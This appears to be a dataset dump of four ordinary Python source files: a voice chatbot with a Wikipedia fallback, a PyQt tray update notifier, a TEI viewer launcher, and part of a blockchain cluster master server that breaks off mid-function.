source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
chatbot.py | from chatterbot import ChatBot
from chatterbot.trainers import ListTrainer
from tkinter import *
import pyttsx3 as pp
import speech_recognition as s
import threading
import wikipedia

# Text-to-speech setup: use the second installed voice.
# NOTE(review): assumes at least two voices are installed -- TODO confirm
# voices[1] exists on the target machine or this raises IndexError.
engine = pp.init()
voices = engine.getProperty('voices')
print(voices)  # debug: show the available voices at startup
engine.setProperty('voice', voices[1].id)
def speak(word):
    """Speak *word* aloud through the module-level pyttsx3 engine.

    Blocks until the utterance has finished playing.
    """
    tts = engine
    tts.say(word)
    tts.runAndWait()
# ChatterBot instance. BestMatch answers with the sentinel '0' whenever no
# stored response is similar enough; ask_from_bot() treats that sentinel as
# a cue to fall back to a Wikipedia summary.
bot = ChatBot(
    "My Bot",
    logic_adapters=[
        {
            'import_path': 'chatterbot.logic.BestMatch',
            # 'default_response': 'I am sorry, but I do not understand.',
            # 'default_response': 'answer_from_bot = wikipedia.summary(query,sentences=4),
            'default_response': '0',
            'maximum_similarity_threshold': 0.90
        }
    ]
)

# Tiny hand-written training corpus: alternating user prompt / bot reply.
convo = [
    'hello',
    'hi there !',
    'hi',
    'what is your name?',
    'My name is Bot, i am created by ali',
    'how are you?',
    'I am doing great these days',
    'thank you',
    'Welcome',
    'In which city you live ?',
    'I live in peshawar',
    'In which language you talk?',
    'I mostly talk in English.',
]

trainer = ListTrainer(bot)
# Train the bot on the scripted conversation above.
trainer.train(convo)
# answer = bot.get_response('What is your name?')
# print(answer)
# print("Talk to bot")
# while True:
# query = input()
# if query == 'exit':
# break
# answer = bot.get_response(query)
# print("bot : ",answer)
# Main application window with the bot's avatar image at the top.
main = Tk()
main.geometry("500x650")
main.title("My Chat bot")

img = PhotoImage(file="bot.png")  # requires bot.png next to the script
photoL = Label(main, image=img)
photoL.pack(pady=5)
def takeQuery():
    """Capture one spoken utterance and submit it as a bot query.

    The recognized text is written into the entry field and ask_from_bot()
    is invoked, so voice input follows exactly the same path as typed input.
    Recognition failures are logged and swallowed so the caller's listening
    loop keeps running.
    """
    sr = s.Recognizer()
    sr.pause_threshold = 1
    print("your bot is listening try to speak")
    with s.Microphone() as m:
        try:
            audio = sr.listen(m)
            # BUGFIX: recognize_google expects a BCP-47 language tag such as
            # 'en-IN'; the original 'eng-in' is not a valid code and the
            # recognition request would fail.
            query = sr.recognize_google(audio, language='en-IN')
            print(query)
            textF.delete(0, END)
            textF.insert(0, query)
            ask_from_bot()
        except Exception as e:
            # Best effort: no speech, unintelligible audio or network errors
            # must not kill the background listening thread.
            print(e)
            print("Not recognized")
def ask_from_bot():
    """Answer the query currently in the text field.

    Asks ChatterBot first; if it returns the '0' sentinel (no good match,
    see the logic adapter's default_response) the answer is fetched from
    Wikipedia instead. The exchange is appended to the message log, spoken
    aloud, and the input field is cleared.
    """
    query = textF.get()
    answer_from_bot = bot.get_response(query)
    # '0' is the BestMatch adapter's default_response, i.e. "no match found".
    if str(answer_from_bot) == '0':
        # NOTE(review): wikipedia.summary can raise (disambiguation / missing
        # page); the original code let that propagate, preserved here.
        answer_from_bot = wikipedia.summary(query, sentences=4)
    # The display/speak sequence was duplicated in both branches; factored
    # into a single tail shared by the bot answer and the Wikipedia fallback.
    msgs.insert(END, "you : " + query)
    msgs.insert(END, "bot : " + str(answer_from_bot))
    speak(answer_from_bot)
    textF.delete(0, END)
    msgs.yview(END)
# Scrollable listbox showing the running conversation.
frame = Frame(main)
sc = Scrollbar(frame)
cs = Scrollbar(frame, orient='horizontal')
msgs = Listbox(frame, width=80, height=20, yscrollcommand=sc.set)
sc.pack(side=RIGHT, fill=Y)
# NOTE(review): the horizontal scrollbar is packed but never wired to the
# listbox (no xscrollcommand) -- decorative only as written.
cs.pack(side=BOTTOM, fill=X)
msgs.pack(side=LEFT, fill=BOTH, pady=10)
frame.pack()

# creating text field
textF = Entry(main, font=("Verdana", 20))
textF.pack(fill=X, pady=10)

btn = Button(main, text="Ask from bot", font=("Verdana", 20), command=ask_from_bot)
btn.pack()
def enter_function(event):
    """Tk <Return> handler: pressing Enter behaves like clicking the button."""
    btn.invoke()

main.bind('<Return>', enter_function)
def repeatL():
    """Background loop: listen for voice queries forever.

    NOTE(review): takeQuery() updates Tk widgets from this worker thread,
    which Tkinter does not guarantee to be safe -- TODO route UI updates
    through the main thread (e.g. via main.after).
    """
    while True:
        takeQuery()
# Run the voice listener in the background. daemon=True is the fix: the
# original non-daemon thread runs an infinite loop, so the process could not
# exit after the Tk main loop (and window) closed.
t = threading.Thread(target=repeatL, daemon=True)
t.start()
main.mainloop() |
systray.py | import time
from threading import Lock, Thread
from typing import List
from PyQt5.QtCore import QThread, pyqtSignal, QCoreApplication, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QSystemTrayIcon, QMenu
from bauh import __app_name__
from bauh.core import resource, system
from bauh.core.controller import ApplicationManager
from bauh.core.model import ApplicationUpdate
from bauh.view.qt.about import AboutDialog
from bauh.view.qt.window import ManageWindow
class UpdateCheck(QThread):
    """Background Qt thread that periodically polls for application updates.

    Emits the full list returned by ``manager.list_updates()`` through
    ``signal`` every ``check_interval`` seconds; the tray icon decides
    whether anything is new enough to notify the user about.
    """

    # Carries the List[ApplicationUpdate] produced by each poll.
    signal = pyqtSignal(list)

    def __init__(self, manager: ApplicationManager, check_interval: int, parent=None):
        super(UpdateCheck, self).__init__(parent)
        self.check_interval = check_interval  # seconds between polls
        self.manager = manager

    def run(self):
        # Runs for the lifetime of the application; the thread is torn down
        # with the process. NOTE(review): an exception from list_updates()
        # would end this loop silently -- TODO confirm that is acceptable.
        while True:
            updates = self.manager.list_updates()
            self.signal.emit(updates)
            time.sleep(self.check_interval)
class TrayIcon(QSystemTrayIcon):
    """System tray icon for bauh: menu, update polling and notifications.

    Owns an UpdateCheck thread that feeds notify_updates(); switches between
    a default and an "updates available" icon, and opens the manage/about
    windows from the context menu or a tray click.
    """

    def __init__(self, locale_keys: dict, manager: ApplicationManager, manage_window: ManageWindow, check_interval: int = 60, update_notification: bool = True):
        super(TrayIcon, self).__init__()
        self.locale_keys = locale_keys  # translation dict, looked up by key
        self.manager = manager

        self.icon_default = QIcon(resource.get_path('img/logo.png'))
        self.icon_update = QIcon(resource.get_path('img/logo_update.png'))
        self.setIcon(self.icon_default)

        # Context menu: manage / about / exit.
        self.menu = QMenu()
        self.action_manage = self.menu.addAction(self.locale_keys['tray.action.manage'])
        self.action_manage.triggered.connect(self.show_manage_window)
        self.action_about = self.menu.addAction(self.locale_keys['tray.action.about'])
        self.action_about.triggered.connect(self.show_about)
        self.action_exit = self.menu.addAction(self.locale_keys['tray.action.exit'])
        self.action_exit.triggered.connect(lambda: QCoreApplication.exit())
        self.setContextMenu(self.menu)

        # manage_window is assigned for real at the end of __init__; it is
        # None-initialized first so the check thread cannot see a half-built
        # object -- TODO confirm that was the intent.
        self.manage_window = None
        self.dialog_about = None
        self.check_thread = UpdateCheck(check_interval=check_interval, manager=self.manager)
        self.check_thread.signal.connect(self.notify_updates)
        self.check_thread.start()

        # Keys of updates already announced, so repeated polls don't re-notify.
        self.last_updates = set()
        self.update_notification = update_notification
        self.lock_notify = Lock()  # serializes notify_updates across callers

        self.activated.connect(self.handle_click)
        self.set_default_tooltip()
        self.manage_window = manage_window

    def set_default_tooltip(self):
        """Tooltip shown when no updates are pending."""
        self.setToolTip('{} ({})'.format(self.locale_keys['manage_window.title'], __app_name__).lower())

    def handle_click(self, reason):
        """Open the manage window on a plain (left) tray click."""
        if reason == self.Trigger:
            self.show_manage_window()

    def verify_updates(self, notify_user: bool = True):
        """Trigger an immediate update check without blocking the caller."""
        Thread(target=self._verify_updates, args=(notify_user,)).start()

    def _verify_updates(self, notify_user: bool):
        self.notify_updates(self.manager.list_updates(), notify_user=notify_user)

    def notify_updates(self, updates: List[ApplicationUpdate], notify_user: bool = True):
        """Refresh icon/tooltip for *updates*; optionally notify the user.

        Only genuinely new updates (keys not seen in the previous poll)
        produce a desktop notification.
        """
        self.lock_notify.acquire()

        try:
            if len(updates) > 0:
                update_keys = {'{}:{}:{}'.format(up.type, up.id, up.version) for up in updates}

                new_icon = self.icon_update

                if update_keys.difference(self.last_updates):
                    self.last_updates = update_keys
                    msg = '{}: {}'.format(self.locale_keys['notification.new_updates'], len(updates))
                    self.setToolTip(msg)

                    if self.update_notification and notify_user:
                        system.notify_user(msg)

            else:
                self.last_updates.clear()
                new_icon = self.icon_default
                self.set_default_tooltip()

            if self.icon().cacheKey() != new_icon.cacheKey():  # changes the icon if needed
                self.setIcon(new_icon)

        finally:
            self.lock_notify.release()

    def show_manage_window(self):
        """Restore or (re)open the manage window, refreshing its app list."""
        if self.manage_window.isMinimized():
            self.manage_window.setWindowState(Qt.WindowNoState)
        elif not self.manage_window.isVisible():
            self.manage_window.refresh_apps()
            self.manage_window.show()

    def show_about(self):
        """Lazily create and show the About dialog."""
        if self.dialog_about is None:
            self.dialog_about = AboutDialog(self.locale_keys)

        if self.dialog_about.isHidden():
            self.dialog_about.show()
|
serve_tei_tx_ui.py | import PySimpleGUIQt as sg
import tendon.py.edit_settings as es
from pathlib import Path
import os
import threading
from tendon.py.serve_tei_transcriptions.serve_tei import launch_tei_viewer as launch
# pylint: disable=no-member
def layout(settings: dict):
    """Build the window layout: a TEI-folder picker plus launch/cancel buttons."""
    folder_row = [
        sg.I(settings['tei_dir'], key='tei_folder'),
        sg.FolderBrowse(initial_folder=settings['tei_dir']),
    ]
    button_row = [
        sg.B('Launch TEI Transcription Viewer', key='launch'),
        sg.B('Cancel', key='exit'),
    ]
    return [
        [sg.Frame('TEI Transcription Folder', [folder_row])],
        button_row,
    ]
def set_initial_dir(tei_dir: str):
    """Persist *tei_dir* (normalized to a POSIX-style path) as the saved TEI folder."""
    normalized = Path(tei_dir).as_posix()
    es.edit_settings('tei_dir', normalized)
def kill_server(httpd):
    """Shut down the TEI viewer's HTTP server and report completion."""
    server = httpd
    server.shutdown()
    print('server stopped')
def serve_tei_tx(main_dir, font: tuple, icon):
    """Run the 'Launch TEI Transcription Viewer' window's event loop.

    Lets the user pick a TEI folder, persists the choice, and starts the
    viewer's HTTP server. Returns False once the window is closed.
    """
    cwd = Path.cwd().as_posix()
    settings = es.get_settings()
    window = sg.Window('Launch TEI Transcription Viewer', layout(settings), font=font, icon=icon)
    httpd = None
    while True:
        event, values = window.read()
        if event in ['exit', sg.WINDOW_CLOSED, None]:
            # Stop the server off the GUI thread so shutdown() cannot block the UI.
            if httpd:
                threading.Thread(target=kill_server, args=[httpd]).start()
            break
        elif event == 'launch':
            if values['tei_folder'] == '':
                continue
            try:
                tei_dir = Path(values['tei_folder'])
            # BUGFIX: was a bare ``except:`` which also swallowed
            # KeyboardInterrupt/SystemExit; Path() only raises these for an
            # unusable value.
            except (TypeError, ValueError):
                continue
            # Accept a file selection by falling back to its parent folder.
            if tei_dir.is_file():
                tei_dir = tei_dir.parent.as_posix()
            else:
                tei_dir = tei_dir.as_posix()
            set_initial_dir(tei_dir)
            httpd = launch(tei_dir, main_dir)
            # Only one server per window session.
            window['launch'].update(disabled=True)
    window.close()
    os.chdir(cwd)  # launch() may change cwd; restore the original
    return False
master.py | import argparse
import asyncio
import ipaddress
import psutil
import random
import time
from collections import deque
from threading import Thread
from typing import Optional, List, Union, Dict, Tuple
from quarkchain.cluster.miner import Miner, MiningWork, validate_seal
from quarkchain.cluster.p2p_commands import (
CommandOp,
Direction,
GetRootBlockHeaderListRequest,
GetRootBlockListRequest,
)
from quarkchain.cluster.protocol import (
ClusterMetadata,
ClusterConnection,
P2PConnection,
ROOT_BRANCH,
NULL_CONNECTION,
)
from quarkchain.cluster.root_state import RootState
from quarkchain.cluster.rpc import (
AddMinorBlockHeaderResponse,
GetEcoInfoListRequest,
GetNextBlockToMineRequest,
GetUnconfirmedHeadersRequest,
GetAccountDataRequest,
AddTransactionRequest,
AddRootBlockRequest,
AddMinorBlockRequest,
CreateClusterPeerConnectionRequest,
DestroyClusterPeerConnectionCommand,
SyncMinorBlockListRequest,
GetMinorBlockRequest,
GetTransactionRequest,
ArtificialTxConfig,
MineRequest,
GenTxRequest,
GetLogResponse,
GetLogRequest,
ShardStats,
EstimateGasRequest,
GetStorageRequest,
GetCodeRequest,
GasPriceRequest,
GetWorkRequest,
GetWorkResponse,
SubmitWorkRequest,
SubmitWorkResponse,
)
from quarkchain.cluster.rpc import (
ConnectToSlavesRequest,
ClusterOp,
CLUSTER_OP_SERIALIZER_MAP,
ExecuteTransactionRequest,
Ping,
GetTransactionReceiptRequest,
GetTransactionListByAddressRequest,
)
from quarkchain.cluster.simple_network import SimpleNetwork
from quarkchain.config import RootConfig
from quarkchain.env import DEFAULT_ENV
from quarkchain.core import (
Branch,
ShardMask,
Log,
Address,
TransactionReceipt,
MinorBlock,
)
from quarkchain.core import Transaction
from quarkchain.db import PersistentDb
from quarkchain.p2p.p2p_network import P2PNetwork, devp2p_app
from quarkchain.utils import Logger, check, time_ms
from quarkchain.cluster.cluster_config import ClusterConfig
class SyncTask:
    """ Given a header and a peer, the task will synchronize the local state
    including root chain and shards with the peer up to the height of the header.
    """

    def __init__(self, header, peer):
        self.header = header
        self.peer = peer
        self.master_server = peer.master_server
        self.root_state = peer.root_state
        # Abort syncing when the fork point is deeper than this many blocks.
        self.max_staleness = (
            self.root_state.env.quark_chain_config.ROOT.MAX_STALE_ROOT_BLOCK_HEIGHT_DIFF
        )

    async def sync(self):
        """Run the sync, closing the peer connection on any failure."""
        try:
            await self.__run_sync()
        except Exception as e:
            Logger.log_exception()
            self.peer.close_with_error(str(e))

    async def __run_sync(self):
        """raise on any error so that sync() will close peer connection"""
        if self.__has_block_hash(self.header.get_hash()):
            return

        # descending height
        block_header_chain = [self.header]

        # Walk backwards until we hit a block we already have.
        while not self.__has_block_hash(block_header_chain[-1].hash_prev_block):
            block_hash = block_header_chain[-1].hash_prev_block
            height = block_header_chain[-1].height - 1

            # abort if we have to download super old blocks
            if self.root_state.tip.height - height > self.max_staleness:
                Logger.warning(
                    "[R] abort syncing due to forking at super old block {} << {}".format(
                        height, self.root_state.tip.height
                    )
                )
                return

            Logger.info(
                "[R] downloading block header list from {} {}".format(
                    height, block_hash.hex()
                )
            )
            block_header_list = await self.__download_block_headers(block_hash)
            # BUGFIX: the original format string had no placeholder, so the
            # header count passed to format() was silently dropped.
            Logger.info(
                "[R] downloaded {} headers from peer".format(len(block_header_list))
            )
            if not self.__validate_block_headers(block_header_list):
                # TODO: tag bad peer
                raise RuntimeError("Bad peer sending discontinuing block headers")
            for header in block_header_list:
                if self.__has_block_hash(header.get_hash()):
                    break
                block_header_chain.append(header)

        # Switch to ascending height and apply blocks in batches of 100.
        block_header_chain.reverse()
        while len(block_header_chain) > 0:
            Logger.info(
                "[R] syncing from {} {}".format(
                    block_header_chain[0].height, block_header_chain[0].get_hash().hex()
                )
            )
            block_chain = await self.__download_blocks(block_header_chain[:100])
            Logger.info("[R] downloaded {} blocks from peer".format(len(block_chain)))
            if len(block_chain) != len(block_header_chain[:100]):
                # TODO: tag bad peer
                raise RuntimeError("Bad peer missing blocks for headers they have")

            for block in block_chain:
                await self.__add_block(block)
                block_header_chain.pop(0)

    def __has_block_hash(self, block_hash):
        return self.root_state.contain_root_block_by_hash(block_hash)

    def __validate_block_headers(self, block_header_list):
        # TODO: check difficulty and other stuff?
        consensus_type = self.root_state.env.quark_chain_config.ROOT.CONSENSUS_TYPE
        for i in range(len(block_header_list) - 1):
            # Headers arrive in descending order: each must link to the next.
            header, prev = block_header_list[i : i + 2]
            if header.height != prev.height + 1:
                return False
            if header.hash_prev_block != prev.get_hash():
                return False
            validate_seal(header, consensus_type)
        return True

    async def __download_block_headers(self, block_hash):
        request = GetRootBlockHeaderListRequest(
            block_hash=block_hash, limit=100, direction=Direction.GENESIS
        )
        op, resp, rpc_id = await self.peer.write_rpc_request(
            CommandOp.GET_ROOT_BLOCK_HEADER_LIST_REQUEST, request
        )
        return resp.block_header_list

    async def __download_blocks(self, block_header_list):
        block_hash_list = [b.get_hash() for b in block_header_list]
        op, resp, rpc_id = await self.peer.write_rpc_request(
            CommandOp.GET_ROOT_BLOCK_LIST_REQUEST,
            GetRootBlockListRequest(block_hash_list),
        )
        return resp.root_block_list

    async def __add_block(self, root_block):
        """Sync the block's minor blocks to slaves, then append the root block."""
        start = time.time()
        await self.__sync_minor_blocks(root_block.minor_block_header_list)
        await self.master_server.add_root_block(root_block)
        elapse = time.time() - start
        Logger.info(
            "[R] syncing root block {} {} took {:.2f} seconds".format(
                root_block.header.height, root_block.header.get_hash().hex(), elapse
            )
        )

    async def __sync_minor_blocks(self, minor_block_header_list):
        """Have each shard's slave download the minor blocks it is missing."""
        minor_block_download_map = dict()
        for m_block_header in minor_block_header_list:
            m_block_hash = m_block_header.get_hash()
            if not self.root_state.is_minor_block_validated(m_block_hash):
                minor_block_download_map.setdefault(m_block_header.branch, []).append(
                    m_block_hash
                )

        future_list = []
        for branch, m_block_hash_list in minor_block_download_map.items():
            slave_conn = self.master_server.get_slave_connection(branch=branch)
            future = slave_conn.write_rpc_request(
                op=ClusterOp.SYNC_MINOR_BLOCK_LIST_REQUEST,
                cmd=SyncMinorBlockListRequest(
                    m_block_hash_list, branch, self.peer.get_cluster_peer_id()
                ),
            )
            future_list.append(future)

        # BUGFIX: the original called gather() without return_exceptions and
        # then tested ``result is Exception``, which is never true -- a failed
        # RPC propagated raw instead of producing the intended RuntimeError.
        result_list = await asyncio.gather(*future_list, return_exceptions=True)
        for result in result_list:
            if isinstance(result, Exception):
                raise RuntimeError(
                    "Unable to download minor blocks from root block with exception {}".format(
                        result
                    )
                )
            _, result, _ = result
            if result.error_code != 0:
                raise RuntimeError("Unable to download minor blocks from root block")

        for m_header in minor_block_header_list:
            self.root_state.add_validated_minor_block_hash(m_header.get_hash())
class Synchronizer:
    """ Buffer the headers received from peer and sync one by one """

    def __init__(self):
        self.queue = deque()
        self.running = False

    def add_task(self, header, peer):
        """Queue a (header, peer) pair and start the drain loop if idle."""
        self.queue.append((header, peer))
        if self.running:
            return
        self.running = True
        asyncio.ensure_future(self.__run())

    async def __run(self):
        # Drain the queue serially: one SyncTask at a time, in FIFO order.
        while self.queue:
            next_header, next_peer = self.queue.popleft()
            await SyncTask(next_header, next_peer).sync()
        self.running = False
class SlaveConnection(ClusterConnection):
    """Master-side RPC connection to a single slave process.

    Mostly thin async wrappers around the cluster RPC protocol: each method
    sends one request and unpacks the response, returning None / a falsy
    value when the slave reports a non-zero error code.
    """

    OP_NONRPC_MAP = {}

    def __init__(
        self, env, reader, writer, master_server, slave_id, shard_mask_list, name=None
    ):
        # OP_RPC_MAP is a module-level dict defined after this class body;
        # it is resolved at call time, so the forward reference is fine.
        super().__init__(
            env,
            reader,
            writer,
            CLUSTER_OP_SERIALIZER_MAP,
            self.OP_NONRPC_MAP,
            OP_RPC_MAP,
            name=name,
        )
        self.master_server = master_server
        self.id = slave_id
        self.shard_mask_list = shard_mask_list
        check(len(shard_mask_list) > 0)

        asyncio.ensure_future(self.active_and_loop_forever())

    def get_connection_to_forward(self, metadata):
        """ Override ProxyConnection.get_connection_to_forward()
        Forward traffic from slave to peer
        """
        if metadata.cluster_peer_id == 0:
            # 0 addresses the master itself; nothing to forward.
            return None

        peer = self.master_server.get_peer(metadata.cluster_peer_id)
        if peer is None:
            return NULL_CONNECTION

        return peer

    def validate_connection(self, connection):
        """Only peer connections (or the null sink) may be forwarded to."""
        return connection == NULL_CONNECTION or isinstance(connection, P2PConnection)

    def has_shard(self, shard_id):
        """True if any of this slave's masks covers *shard_id*."""
        for shard_mask in self.shard_mask_list:
            if shard_mask.contain_shard_id(shard_id):
                return True
        return False

    def has_overlap(self, shard_mask):
        """True if this slave serves any shard matched by *shard_mask*."""
        for local_shard_mask in self.shard_mask_list:
            if local_shard_mask.has_overlap(shard_mask):
                return True
        return False

    async def send_ping(self, initialize_shard_state=False):
        """Ping the slave; returns the (id, shard_mask_list) it reports.

        When *initialize_shard_state* is set, the current root tip block is
        included so the slave can initialize its shard state from it.
        """
        root_block = (
            self.master_server.root_state.get_tip_block()
            if initialize_shard_state
            else None
        )
        req = Ping("", [], root_block)
        op, resp, rpc_id = await self.write_rpc_request(
            op=ClusterOp.PING,
            cmd=req,
            metadata=ClusterMetadata(branch=ROOT_BRANCH, cluster_peer_id=0),
        )
        return (resp.id, resp.shard_mask_list)

    async def send_connect_to_slaves(self, slave_info_list):
        """ Make slave connect to other slaves.
        Returns True on success
        """
        req = ConnectToSlavesRequest(slave_info_list)
        op, resp, rpc_id = await self.write_rpc_request(
            ClusterOp.CONNECT_TO_SLAVES_REQUEST, req
        )
        check(len(resp.result_list) == len(slave_info_list))
        for i, result in enumerate(resp.result_list):
            # A non-empty result string is the per-target error message.
            if len(result) > 0:
                Logger.info(
                    "Slave {} failed to connect to {} with error {}".format(
                        self.id, slave_info_list[i].id, result
                    )
                )
                return False
        Logger.info("Slave {} connected to other slaves successfully".format(self.id))
        return True

    def close(self):
        # Losing any slave is fatal for the whole cluster.
        Logger.info("Lost connection with slave {}".format(self.id))
        super().close()
        self.master_server.shutdown()

    def close_with_error(self, error):
        Logger.info("Closing connection with slave {}".format(self.id))
        return super().close_with_error(error)

    async def add_transaction(self, tx):
        """Submit *tx* to the slave; True when it was accepted."""
        request = AddTransactionRequest(tx)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.ADD_TRANSACTION_REQUEST, request
        )
        return resp.error_code == 0

    async def execute_transaction(
        self, tx: Transaction, from_address, block_height: Optional[int]
    ):
        """Execute *tx* read-only at *block_height*; result bytes or None."""
        request = ExecuteTransactionRequest(tx, from_address, block_height)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.EXECUTE_TRANSACTION_REQUEST, request
        )
        return resp.result if resp.error_code == 0 else None

    async def get_minor_block_by_hash(self, block_hash, branch):
        """Fetch a minor block by hash; None when unknown or on error."""
        request = GetMinorBlockRequest(branch, minor_block_hash=block_hash)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.GET_MINOR_BLOCK_REQUEST, request
        )
        if resp.error_code != 0:
            return None
        return resp.minor_block

    async def get_minor_block_by_height(self, height, branch):
        """Fetch a minor block by height; None when unknown or on error."""
        request = GetMinorBlockRequest(branch, height=height)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.GET_MINOR_BLOCK_REQUEST, request
        )
        if resp.error_code != 0:
            return None
        return resp.minor_block

    async def get_transaction_by_hash(self, tx_hash, branch):
        """Return (minor_block, index) containing the tx, or (None, None)."""
        request = GetTransactionRequest(tx_hash, branch)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.GET_TRANSACTION_REQUEST, request
        )
        if resp.error_code != 0:
            return None, None
        return resp.minor_block, resp.index

    async def get_transaction_receipt(self, tx_hash, branch):
        """Return (minor_block, index, receipt) for the tx, or None on error."""
        request = GetTransactionReceiptRequest(tx_hash, branch)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.GET_TRANSACTION_RECEIPT_REQUEST, request
        )
        if resp.error_code != 0:
            return None
        return resp.minor_block, resp.index, resp.receipt

    async def get_transactions_by_address(self, address, start, limit):
        """Page through an address's transactions; (tx_list, next) or None."""
        request = GetTransactionListByAddressRequest(address, start, limit)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.GET_TRANSACTION_LIST_BY_ADDRESS_REQUEST, request
        )
        if resp.error_code != 0:
            return None
        return resp.tx_list, resp.next

    async def get_logs(
        self,
        branch: Branch,
        addresses: List[Address],
        topics: List[List[bytes]],
        start_block: int,
        end_block: int,
    ) -> Optional[List[Log]]:
        """Query event logs over a block range; None on error."""
        request = GetLogRequest(branch, addresses, topics, start_block, end_block)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.GET_LOG_REQUEST, request
        )  # type: GetLogResponse
        return resp.logs if resp.error_code == 0 else None

    async def estimate_gas(
        self, tx: Transaction, from_address: Address
    ) -> Optional[int]:
        """Estimate gas for *tx*; None on error."""
        request = EstimateGasRequest(tx, from_address)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.ESTIMATE_GAS_REQUEST, request
        )
        return resp.result if resp.error_code == 0 else None

    async def get_storage_at(
        self, address: Address, key: int, block_height: Optional[int]
    ) -> Optional[bytes]:
        """Read a contract storage slot; None on error."""
        request = GetStorageRequest(address, key, block_height)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.GET_STORAGE_REQUEST, request
        )
        return resp.result if resp.error_code == 0 else None

    async def get_code(
        self, address: Address, block_height: Optional[int]
    ) -> Optional[bytes]:
        """Fetch contract code at *address*; None on error."""
        request = GetCodeRequest(address, block_height)
        _, resp, _ = await self.write_rpc_request(ClusterOp.GET_CODE_REQUEST, request)
        return resp.result if resp.error_code == 0 else None

    async def gas_price(self, branch: Branch) -> Optional[int]:
        """Current gas price estimate for *branch*; None on error."""
        request = GasPriceRequest(branch)
        _, resp, _ = await self.write_rpc_request(ClusterOp.GAS_PRICE_REQUEST, request)
        return resp.result if resp.error_code == 0 else None

    async def get_work(self, branch: Branch) -> Optional[MiningWork]:
        """Fetch remote-mining work for *branch*; None on error."""
        request = GetWorkRequest(branch)
        _, resp, _ = await self.write_rpc_request(ClusterOp.GET_WORK_REQUEST, request)
        get_work_resp = resp  # type: GetWorkResponse
        if get_work_resp.error_code != 0:
            return None
        return MiningWork(
            get_work_resp.header_hash, get_work_resp.height, get_work_resp.difficulty
        )

    async def submit_work(
        self, branch: Branch, header_hash: bytes, nonce: int, mixhash: bytes
    ) -> bool:
        """Submit a mining solution; True only when accepted by the slave."""
        request = SubmitWorkRequest(branch, header_hash, nonce, mixhash)
        _, resp, _ = await self.write_rpc_request(
            ClusterOp.SUBMIT_WORK_REQUEST, request
        )
        submit_work_resp = resp  # type: SubmitWorkResponse
        return submit_work_resp.error_code == 0 and submit_work_resp.success

    # RPC handlers

    async def handle_add_minor_block_header_request(self, req):
        """Record a validated minor block header and refresh shard statistics."""
        self.master_server.root_state.add_validated_minor_block_hash(
            req.minor_block_header.get_hash()
        )
        self.master_server.update_shard_stats(req.shard_stats)
        self.master_server.update_tx_count_history(
            req.tx_count, req.x_shard_tx_count, req.minor_block_header.create_time
        )
        return AddMinorBlockHeaderResponse(
            error_code=0,
            artificial_tx_config=self.master_server.get_artificial_tx_config(),
        )
# Request-op -> (response-op, handler) table for SlaveConnection. Defined at
# module level after the class so the unbound handler can be referenced;
# SlaveConnection.__init__ passes this map to ClusterConnection.
OP_RPC_MAP = {
    ClusterOp.ADD_MINOR_BLOCK_HEADER_REQUEST: (
        ClusterOp.ADD_MINOR_BLOCK_HEADER_RESPONSE,
        SlaveConnection.handle_add_minor_block_header_request,
    )
}
class MasterServer:
""" Master node in a cluster
It does two things to initialize the cluster:
1. Setup connection with all the slaves in ClusterConfig
2. Make slaves connect to each other
"""
    def __init__(self, env, root_state, name="master"):
        """Set up cluster bookkeeping; actual startup happens in start()."""
        self.loop = asyncio.get_event_loop()
        self.env = env
        self.root_state = root_state
        self.network = None  # will be set by SimpleNetwork
        self.cluster_config = env.cluster_config

        # branch value -> a list of slave running the shard
        self.branch_to_slaves = dict()  # type: Dict[int, List[SlaveConnection]]
        self.slave_pool = set()

        # Resolved once every slave is connected and shards are initialized.
        self.cluster_active_future = self.loop.create_future()
        self.shutdown_future = self.loop.create_future()
        self.name = name

        # Target block times seeded from config (shard 0's for minor blocks).
        self.artificial_tx_config = ArtificialTxConfig(
            target_root_block_time=self.env.quark_chain_config.ROOT.CONSENSUS_CONFIG.TARGET_BLOCK_TIME,
            target_minor_block_time=self.env.quark_chain_config.SHARD_LIST[
                0
            ].CONSENSUS_CONFIG.TARGET_BLOCK_TIME,
        )

        self.synchronizer = Synchronizer()

        self.branch_to_shard_stats = dict()  # type: Dict[int, ShardStats]
        # (epoch in minute, tx_count in the minute)
        self.tx_count_history = deque()

        self.__init_root_miner()
    def __init_root_miner(self):
        """Create the root-chain Miner, wired to this server's block pipeline."""
        miner_address = self.env.quark_chain_config.testnet_master_address

        async def __create_block():
            # Retry until a root block (not a fallback minor block) is mineable.
            while True:
                is_root, block = await self.get_next_block_to_mine(
                    address=miner_address, shard_mask_value=0, prefer_root=True
                )
                if is_root:
                    return block
                await asyncio.sleep(1)

        def __get_mining_params():
            return {
                "target_block_time": self.get_artificial_tx_config().target_root_block_time
            }

        root_config = self.env.quark_chain_config.ROOT  # type: RootConfig
        self.root_miner = Miner(
            root_config.CONSENSUS_TYPE,
            __create_block,
            self.add_root_block,
            __get_mining_params,
            remote=root_config.CONSENSUS_CONFIG.REMOTE_MINE,
        )
    def __get_shard_size(self):
        """Number of shards in the network (static, from config)."""
        # TODO: replace it with dynamic size
        return self.env.quark_chain_config.SHARD_SIZE
    def get_shard_size(self):
        """Public accessor for the private shard-size helper."""
        return self.__get_shard_size()
    def get_artificial_tx_config(self):
        """Current target block-time / artificial-tx configuration."""
        return self.artificial_tx_config
def __has_all_shards(self):
""" Returns True if all the shards have been run by at least one node """
return len(self.branch_to_slaves) == self.__get_shard_size() and all(
[len(slaves) > 0 for _, slaves in self.branch_to_slaves.items()]
)
    async def __connect(self, ip, port):
        """ Retries until success """
        Logger.info("Trying to connect {}:{}".format(ip, port))
        # Loop forever: a slave that never comes up blocks cluster startup by design.
        while True:
            try:
                # NOTE(review): the ``loop=`` kwarg was removed from
                # asyncio.open_connection in Python 3.10 -- TODO confirm the
                # supported interpreter range.
                reader, writer = await asyncio.open_connection(ip, port, loop=self.loop)
                break
            except Exception as e:
                Logger.info("Failed to connect {} {}: {}".format(ip, port, e))
                await asyncio.sleep(
